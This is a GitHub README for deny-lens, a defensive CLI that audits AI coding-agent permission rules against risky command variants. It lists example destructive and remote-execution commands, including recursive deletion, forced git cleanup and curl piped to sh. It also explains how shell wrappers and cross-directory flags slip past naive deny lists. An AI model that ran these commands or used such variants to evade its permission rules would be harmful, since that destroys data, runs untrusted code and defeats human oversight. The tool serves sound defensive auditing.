Skip to content

Repository files navigation

Deny Lens

Audit AI coding-agent permission rules against dangerous command variants.

简体中文

deny-lens is a local-first CLI for teams using AI coding agents with permission rules, deny lists, and hooks. It checks whether your policy actually covers common dangerous command variants such as git -C .. clean -fdx, bash -lc "rm -rf dist", curl | sh, PowerShell recursive deletion, and environment exfiltration.

It does not execute target commands. It reads policy files, normalizes rules, evaluates built-in probes, and writes Markdown, JSON, or SARIF reports.

Why This Exists

AI coding agents are moving from manual copy-paste into semi-autonomous development workflows. Permission rules are becoming infrastructure. The weak point is that many policies only block the obvious command spelling while missing shell wrappers, cross-directory flags, pipes, or Windows equivalents.

deny-lens turns that question into a repeatable check:

Does this policy block the risky variants, merely ask, explicitly allow them, or miss them?

Install

npm install -g deny-lens

For local development:

git clone https://github.com/maxi-maxima/deny-lens.git
cd deny-lens
npm install
npm run build

Quick Start

Audit the current repository:

deny-lens scan .

Write JSON for automation:

deny-lens scan . --format json --out reports/deny-lens.json

Generate a demo workspace and reports:

deny-lens demo --out reports/demo

Explain one built-in probe:

deny-lens explain remote.curl-sh .

Example Risky Policy

{
  "permissions": {
    "deny": ["rm -rf", "git clean -fdx"],
    "ask": ["curl"],
    "allow": ["npm test"]
  }
}

This looks reasonable, but it may still miss variants such as:

bash -lc "rm -rf dist"
git -C .. clean -fdx
curl https://example.test/install.sh | sh
powershell -Command Remove-Item -Recurse -Force dist

Report Excerpt

# deny-lens report

## Summary

- Blocked: 2
- Escalated: 1
- Allowed: 0
- Uncovered: 3
- Unknown: 0

### remote.curl-sh: Remote script execution

- Status: **escalated**
- Severity: critical
- Reason: Covered by an ask or hook rule, but still requires operator attention.

Supported Inputs

The first release supports Claude Code style policy files:

  • .claude/settings.json
  • .claude/settings.local.json
  • .claude/hooks.json

The internal model is intentionally vendor-neutral so future releases can add other agent policy formats.

Probe Categories

  • Destructive filesystem changes
  • Forced repository cleanup
  • Remote script execution
  • Environment or token exfiltration
  • Shell wrapper policy bypass
  • Cross-directory execution

Exit Codes

Code Meaning
0 No high severity uncovered, allowed, or unknown probes.
1 A high or critical probe is uncovered, explicitly allowed, or unknown.
2 Usage error, malformed config in strict mode, or unsupported format.

CI Example

- run: npm install -g deny-lens
- run: deny-lens scan . --format sarif --out reports/deny-lens.sarif --strict

Project Boundary

deny-lens is not a generic SAST, secret scanner, sandbox, or exploit runner. It is a focused permission-policy coverage checker for AI coding-agent workflows.

Development

npm install
npm run check
node dist/cli.js demo --out reports/demo
npm pack --dry-run --ignore-scripts

License

MIT

About

Audit AI coding-agent permission rules against dangerous command variants.

Topics

Resources

Contributing

Security policy

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages